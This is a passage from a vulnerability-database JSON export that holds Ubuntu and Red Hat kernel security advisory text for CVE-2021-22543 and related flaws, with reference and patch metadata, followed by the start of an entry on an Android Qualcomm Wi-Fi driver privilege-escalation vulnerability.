Deployment drops annotations\n1990175 - [Kuryr][4.7] Duplicated egress rule for service network in knp object\n1991445 - Update failed - ovn-nbctl: duplicate nexthop for the same ECMP route\n1992240 - Unable to install a zVM hosted OCP 4.7.24 on Z Cluster based on new RHCOS 47 RHEL 8.4 based build\n1992687 - alerts: SystemMemoryExceedsReservation triggers too quickly\n1993386 - failed to start cri-o service due to /usr/libexec/crio/conmon is missing\n1994123 - Thanos build failure: vendor/ ignored\n1994645 - Ipv6 IP addresses are not accepted for whitelisting\n1994729 - upgrade from 4.6 to 4.7 to 4.8 with mcp worker \"paused=true\",  crio report \"panic: close of closed channel\" which lead to a master Node go into Restart loop\n1995810 - long living clusters may fail to upgrade because of an invalid conmon path\n1998112 - Networking issue with vSphere clusters running HW14 and later\n\n5. 8.1) - ppc64le, x86_64\n\n3. Description:\n\nThis is a kernel live patch module which is automatically loaded by the RPM\npost-install script to modify the code of a running kernel. ==========================================================================\nUbuntu Security Notice USN-5094-1\nSeptember 29, 2021\n\nlinux, linux-aws, linux-aws-hwe, linux-azure, linux-azure-4.15,\nlinux-dell300x, linux-gcp, linux-gcp-4.15, linux-hwe, linux-kvm,\nlinux-oracle, linux-snapdragon vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 ESM\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. An attacker who could start and\ncontrol a VM could possibly use this to expose sensitive information or\nexecute arbitrary code. (CVE-2021-22543)\n\nIt was discovered that the tracing subsystem in the Linux kernel did not\nproperly keep track of per-cpu ring buffer state. A privileged attacker\ncould use this to cause a denial of service. (CVE-2021-3679)\n\nAlois Wohlschlager discovered that the overlay file system in the Linux\nkernel did not restrict private clones in some situations. An attacker\ncould use this to expose sensitive information. (CVE-2021-3732)\n\nAlexey Kardashevskiy discovered that the KVM implementation for PowerPC\nsystems in the Linux kernel did not properly validate RTAS arguments in\nsome situations. An attacker in a guest vm could use this to cause a denial\nof service (host OS crash) or possibly execute arbitrary code. \n(CVE-2021-37576)\n\nIt was discovered that the MAX-3421 host USB device driver in the Linux\nkernel did not properly handle device removal events. A physically\nproximate attacker could use this to cause a denial of service (system\ncrash). (CVE-2021-38204)\n\nIt was discovered that the Xilinx 10/100 Ethernet Lite device driver in the\nLinux kernel could report pointer addresses in some situations. An attacker\ncould use this information to ease the exploitation of another\nvulnerability. (CVE-2021-38205)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n  linux-image-4.15.0-1028-dell300x  4.15.0-1028.33\n  linux-image-4.15.0-1081-oracle  4.15.0-1081.89\n  linux-image-4.15.0-1100-kvm     4.15.0-1100.102\n  linux-image-4.15.0-1109-gcp     4.15.0-1109.123\n  linux-image-4.15.0-1112-aws     4.15.0-1112.119\n  linux-image-4.15.0-1113-snapdragon  4.15.0-1113.122\n  linux-image-4.15.0-1124-azure   4.15.0-1124.137\n  linux-image-4.15.0-159-generic  4.15.0-159.167\n  linux-image-4.15.0-159-generic-lpae  4.15.0-159.167\n  linux-image-4.15.0-159-lowlatency  4.15.0-159.167\n  linux-image-aws-lts-18.04       4.15.0.1112.115\n  linux-image-azure-lts-18.04     4.15.0.1124.97\n  linux-image-dell300x            4.15.0.1028.30\n  linux-image-gcp-lts-18.04       4.15.0.1109.128\n  linux-image-generic             4.15.0.159.148\n  linux-image-generic-lpae        4.15.0.159.148\n  linux-image-kvm                 4.15.0.1100.96\n  linux-image-lowlatency          4.15.0.159.148\n  linux-image-oracle-lts-18.04    4.15.0.1081.91\n  linux-image-snapdragon          4.15.0.1113.116\n  linux-image-virtual             4.15.0.159.148\n\nUbuntu 16.04 ESM:\n  linux-image-4.15.0-1081-oracle  4.15.0-1081.89~16.04.1\n  linux-image-4.15.0-1109-gcp     4.15.0-1109.123~16.04.1\n  linux-image-4.15.0-1112-aws     4.15.0-1112.119~16.04.1\n  linux-image-4.15.0-1124-azure   4.15.0-1124.137~16.04.1\n  linux-image-4.15.0-159-generic  4.15.0-159.167~16.04.1\n  linux-image-4.15.0-159-lowlatency  4.15.0-159.167~16.04.1\n  linux-image-aws-hwe             4.15.0.1112.103\n  linux-image-azure               4.15.0.1124.115\n  linux-image-gcp                 4.15.0.1109.110\n  linux-image-generic-hwe-16.04   4.15.0.159.152\n  linux-image-gke                 4.15.0.1109.110\n  linux-image-lowlatency-hwe-16.04  4.15.0.159.152\n  linux-image-oem                 4.15.0.159.152\n  linux-image-oracle              4.15.0.1081.69\n  linux-image-virtual-hwe-16.04   4.15.0.159.152\n\nUbuntu 14.04 ESM:\n  linux-image-4.15.0-1124-azure   4.15.0-1124.137~14.04.1\n  linux-image-azure               4.15.0.1124.97\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      },
      {
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22543"
      },
      {
        "db": "PACKETSTORM",
        "id": "164478"
      },
      {
        "db": "PACKETSTORM",
        "id": "164562"
      },
      {
        "db": "PACKETSTORM",
        "id": "163926"
      },
      {
        "db": "PACKETSTORM",
        "id": "163768"
      },
      {
        "db": "PACKETSTORM",
        "id": "164469"
      },
      {
        "db": "PACKETSTORM",
        "id": "163972"
      },
      {
        "db": "PACKETSTORM",
        "id": "164028"
      },
      {
        "db": "PACKETSTORM",
        "id": "163861"
      },
      {
        "db": "PACKETSTORM",
        "id": "164331"
      },
      {
        "db": "PACKETSTORM",
        "id": "164237"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2021-22543",
        "trust": 2.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2021/06/26/1",
        "trust": 1.2
      },
      {
        "db": "PACKETSTORM",
        "id": "164589",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164666",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164652",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "167858",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164583",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-380980",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22543",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164478",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164562",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163926",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163768",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164469",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163972",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164028",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "163861",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164331",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "164237",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22543"
      },
      {
        "db": "PACKETSTORM",
        "id": "164478"
      },
      {
        "db": "PACKETSTORM",
        "id": "164562"
      },
      {
        "db": "PACKETSTORM",
        "id": "163926"
      },
      {
        "db": "PACKETSTORM",
        "id": "163768"
      },
      {
        "db": "PACKETSTORM",
        "id": "164469"
      },
      {
        "db": "PACKETSTORM",
        "id": "163972"
      },
      {
        "db": "PACKETSTORM",
        "id": "164028"
      },
      {
        "db": "PACKETSTORM",
        "id": "163861"
      },
      {
        "db": "PACKETSTORM",
        "id": "164331"
      },
      {
        "db": "PACKETSTORM",
        "id": "164237"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "id": "VAR-202105-1451",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-380980"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T20:21:39.668000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20225640 - security advisory"
      },
      {
        "title": "Red Hat: CVE-2021-22543",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2021-22543"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2021-1699",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2021-1699"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=cve-2021-22543 log"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2021-1539",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=alas-2021-1539"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.4-2022-004",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.4-2022-004"
      },
      {
        "title": "Amazon Linux 2: ALAS2KERNEL-5.10-2022-002",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2kernel-5.10-2022-002"
      },
      {
        "title": "CVE-2021-22543",
        "trust": 0.1,
        "url": "https://github.com/jamesgeeee/cve-2021-22543 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-119",
        "trust": 1.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.2,
        "url": "https://security.netapp.com/advisory/ntap-20210708-0002/"
      },
      {
        "trust": 1.2,
        "url": "https://github.com/google/security-research/security/advisories/ghsa-7wq5-phmq-m584"
      },
      {
        "trust": 1.2,
        "url": "https://lists.debian.org/debian-lts-announce/2021/10/msg00010.html"
      },
      {
        "trust": 1.2,
        "url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00012.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.openwall.com/lists/oss-security/2021/06/26/1"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22543"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4g5ybuvephzyxmkngbz3s6infcteel4e/"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/roqixqb7zawi3ksgshr6h5rduwzi775s/"
      },
      {
        "trust": 0.9,
        "url": "https://access.redhat.com/security/cve/cve-2021-22543"
      },
      {
        "trust": 0.8,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22555"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2021-22555"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-37576"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2021-3609"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3609"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2021-37576"
      },
      {
        "trust": 0.2,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/roqixqb7zawi3ksgshr6h5rduwzi775s/"
      },
      {
        "trust": 0.2,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4g5ybuvephzyxmkngbz3s6infcteel4e/"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3653"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3656"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-3653"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3656"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32399"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-32399"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/119.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:5640"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/jamesgeeee/cve-2021-22543"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3812"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21670"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-25648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-36222"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32626"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32687"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-37750"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21670"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32626"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-41099"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-25741"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23840"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23017"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32675"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22924"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-37750"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22922"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2020-25648"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-21671"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4658"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22924"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32675"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2016-4658"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-41099"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32687"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32690"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32628"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-21671"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-32672"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32690"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-36222"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23841"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23017"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-25741"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32627"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32672"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-22923"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-23841"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-23840"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-32628"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3235"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/articles/2974891"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3621"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3621"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3057"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3766"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3380"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-rel"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3262"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhba-2021:3263"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-3121"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2021-27218"
      },
      {
        "trust": 0.1,
        "url": "https://docs.openshift.com/container-platform/4.7/updating/updating-cluster"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2021:3181"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1100.102"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38204"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1028.33"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1109.123"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1081.89"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38205"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3732"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1113.122"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1124.137"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5094-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1112.119"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3679"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-159.167"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5071-1"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5071-3"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3612"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1043.47~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1043.47"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22543"
      },
      {
        "db": "PACKETSTORM",
        "id": "164478"
      },
      {
        "db": "PACKETSTORM",
        "id": "164562"
      },
      {
        "db": "PACKETSTORM",
        "id": "163926"
      },
      {
        "db": "PACKETSTORM",
        "id": "163768"
      },
      {
        "db": "PACKETSTORM",
        "id": "164469"
      },
      {
        "db": "PACKETSTORM",
        "id": "163972"
      },
      {
        "db": "PACKETSTORM",
        "id": "164028"
      },
      {
        "db": "PACKETSTORM",
        "id": "163861"
      },
      {
        "db": "PACKETSTORM",
        "id": "164331"
      },
      {
        "db": "PACKETSTORM",
        "id": "164237"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "db": "VULMON",
        "id": "CVE-2021-22543"
      },
      {
        "db": "PACKETSTORM",
        "id": "164478"
      },
      {
        "db": "PACKETSTORM",
        "id": "164562"
      },
      {
        "db": "PACKETSTORM",
        "id": "163926"
      },
      {
        "db": "PACKETSTORM",
        "id": "163768"
      },
      {
        "db": "PACKETSTORM",
        "id": "164469"
      },
      {
        "db": "PACKETSTORM",
        "id": "163972"
      },
      {
        "db": "PACKETSTORM",
        "id": "164028"
      },
      {
        "db": "PACKETSTORM",
        "id": "163861"
      },
      {
        "db": "PACKETSTORM",
        "id": "164331"
      },
      {
        "db": "PACKETSTORM",
        "id": "164237"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2021-05-26T00:00:00",
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "date": "2021-05-26T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-22543"
      },
      {
        "date": "2021-10-12T15:34:44",
        "db": "PACKETSTORM",
        "id": "164478"
      },
      {
        "date": "2021-10-20T15:45:47",
        "db": "PACKETSTORM",
        "id": "164562"
      },
      {
        "date": "2021-08-28T13:22:22",
        "db": "PACKETSTORM",
        "id": "163926"
      },
      {
        "date": "2021-08-10T14:48:02",
        "db": "PACKETSTORM",
        "id": "163768"
      },
      {
        "date": "2021-10-12T15:33:21",
        "db": "PACKETSTORM",
        "id": "164469"
      },
      {
        "date": "2021-08-31T15:58:41",
        "db": "PACKETSTORM",
        "id": "163972"
      },
      {
        "date": "2021-09-02T15:23:31",
        "db": "PACKETSTORM",
        "id": "164028"
      },
      {
        "date": "2021-08-17T15:14:36",
        "db": "PACKETSTORM",
        "id": "163861"
      },
      {
        "date": "2021-09-29T14:51:35",
        "db": "PACKETSTORM",
        "id": "164331"
      },
      {
        "date": "2021-09-22T16:24:38",
        "db": "PACKETSTORM",
        "id": "164237"
      },
      {
        "date": "2021-05-26T11:15:08.623000",
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-04-01T00:00:00",
        "db": "VULHUB",
        "id": "VHN-380980"
      },
      {
        "date": "2022-04-01T00:00:00",
        "db": "VULMON",
        "id": "CVE-2021-22543"
      },
      {
        "date": "2024-05-29T20:15:09.870000",
        "db": "NVD",
        "id": "CVE-2021-22543"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "164237"
      }
    ],
    "trust": 0.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Red Hat Security Advisory 2021-3812-01",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "164478"
      }
    ],
    "trust": 0.1
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "arbitrary",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "164331"
      },
      {
        "db": "PACKETSTORM",
        "id": "164237"
      }
    ],
    "trust": 0.2
  }
}

var-201702-0753
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32402604. References: QC-CR#1092497. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
